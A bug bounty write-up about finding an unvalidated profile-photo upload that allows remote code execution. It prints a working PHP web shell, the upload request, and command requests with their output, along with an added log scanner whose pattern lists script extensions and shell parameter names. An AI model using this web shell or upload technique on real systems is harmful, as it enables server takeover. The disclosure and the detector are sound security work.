BPP [$750] Arbitrary File Upload Vulnerability to Remote Code Execution (RCE) Outside the Platform
Hello everyone, my name is Tengku Arya Saputra (follow me on LinkedIn). In this post I will describe how I found a security hole rated critical. I found this bug outside of any bug bounty platform, so this was an external program.
Initially, I found this vulnerability while testing an application that has a feature for updating the user's profile photo. I started by observing the requests and responses of this feature with an intercepting proxy such as Burp Suite. The endpoint used was /mobile/update-photo, which accepts image files uploaded by users.
In the request, I noticed that the application did not validate the extension of the uploaded file. This caught my attention because a feature like this generally only allows files of a certain format, such as .jpg or .png. To prove this hypothesis, I renamed the uploaded file so that it had a .php extension and put the following code in its content:
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}
?>
Then, I uploaded the file through the following request:
POST /mobile/update-photo HTTP/2
Host: xxx.xxx.com
Cookie: [user session cookie]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEfvVAWnBQLlnzk1m

------WebKitFormBoundaryEfvVAWnBQLlnzk1m
Content-Disposition: form-data; name="file_photo"; filename="malicious.php"
Content-Type: application/x-php

<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}
?>
------WebKitFormBoundaryEfvVAWnBQLlnzk1m--
After sending the request, the server responded with a “Success” message. This means that my file was successfully uploaded without any further validation. Next, I tried to find out the location of the uploaded file, and based on the HTTP activity I observed, my file was available at the following URL:
https://xxxx.xxx.com/assets/images/profile/xxxxxxxxxx/xxxxxxxxxx2881531.php
When I accessed the file with a ?cmd= parameter added, I could execute commands on the server directly. For example, I sent the following request:
GET /assets/images/profile/xxxxxxxxxx/xxxx00122881531.php?cmd=dir HTTP/2
Host: xxxx.xxx.com
The server responded with the directory listing:
Volume in drive C has no label.
Directory of C:\xxxxxxxxx\xxxxxx
11/17/2024 12:00 PM <DIR> .
11/17/2024 12:00 PM <DIR> ..
11/17/2024 12:00 PM 1,024 malicious.php
After that, I tried running additional commands such as ipconfig /all and systeminfo to get more information about the server. Here is some of the information I managed to obtain:
Command:
GET /assets/images/profile/xxxxxxxxx/xxxxxx0122881531.php?cmd=ipconfig%20/all HTTP/2
Host: xxxx.xxx.com
https://xxx.xxxxx.com/assets/images/profile/xxxxxxxxxxxxxxx/xxxxxx122881531.php?cmd=systeminfo
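From the defender's side, the activity above leaves a distinctive trail in the web server access log: requests for script-extension paths under a directory that should only hold images, carrying a command-style query parameter and answered with 200. The scanner below is an added example, not from this write-up or the affected site, that flags such lines in combined log format. The log lines it scans are constructed to mirror the paths in this post with made-up client IPs, timestamps and user agents; the upload directory prefix, the script extensions and the parameter names are assumptions for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (Apache/Nginx combined format). Paths mirror the
# write-up; IPs, timestamps and user agents are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Nov/2024:12:00:01 +0000] "POST /mobile/update-photo HTTP/2.0" 200 42 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Nov/2024:12:00:09 +0000] "GET /assets/images/profile/user1/0122881531.php?cmd=dir HTTP/2.0" 200 311 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Nov/2024:12:00:15 +0000] "GET /assets/images/profile/user1/0122881531.php?cmd=ipconfig%20/all HTTP/2.0" 200 1843 "-" "Mozilla/5.0"
198.51.100.4 - - [17/Nov/2024:12:01:00 +0000] "GET /assets/images/profile/user2/avatar.png HTTP/2.0" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [17/Nov/2024:12:01:02 +0000] "GET /assets/images/profile/user2/old.php HTTP/2.0" 404 153 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed: directories that should only ever serve static images, and the
# server-side script extensions that must never be requested beneath them.
UPLOAD_DIRS = ("/assets/images/profile/",)
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar", ".asp", ".aspx", ".jsp", ".cgi")
# Query keys that simple command-execution webshells commonly read.
SHELL_PARAMS = {"cmd", "c", "exec", "command"}


def classify(line: str):
    """Return a finding dict for a suspicious line, or None for benign/unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = parts.path.lower()
    if not any(path.startswith(d) for d in UPLOAD_DIRS):
        return None

    reasons = []
    script_hit = path.endswith(SCRIPT_EXTS)
    if script_hit:
        reasons.append("script extension in image upload path")
    keys = set(parse_qs(parts.query, keep_blank_values=True)) & SHELL_PARAMS
    if keys:
        reasons.append("command-style parameter " + ",".join(sorted(keys)))
    if not reasons:
        return None

    # A 2xx answer for a script path means the server executed (or at least
    # served) it; a 404 is a probe or a leftover and is worth a look, not a page.
    severity = "high" if script_hit and m["status"].startswith("2") else "medium"
    return {
        "ip": m["ip"],
        "time": m["ts"],
        "path": parts.path,
        "status": m["status"],
        "reasons": reasons,
        "severity": severity,
    }


def scan_access_log(text: str) -> list:
    """Scan every line and collect findings in log order."""
    findings = []
    for line in text.splitlines():
        finding = classify(line)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ip']} {f['status']} {f['path']} :: {'; '.join(f['reasons'])}")
```

In production the same rule is better enforced before the request reaches the application: a web server location block for the upload directory that disables script execution and serves files with a fixed image Content-Type turns every line this scanner flags as high into a 403 or a harmless download.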
Vulnerability Impact: This vulnerability allowed me to execute commands directly on the server, known as Remote Code Execution (RCE). With this access, I could:
- Access and read sensitive files on the server.
- Expose operating system and network configurations.
- Use the server as a pivot to attack other systems on the network.
Conclusion: This was my experience finding a critical vulnerability in an external application. I hope this post serves as a lesson for developers and the cybersecurity community to pay more attention to validation in file upload features. Don’t forget to follow me on LinkedIn for more interesting content! 😁
Timeline
Report — December 2, 2024
Changed to Triaged — December 9, 2024
Team responded — December 15, 2024
Bounty of $750 paid via mobile banking – December 22, 2024
Resolved — December 22, 2024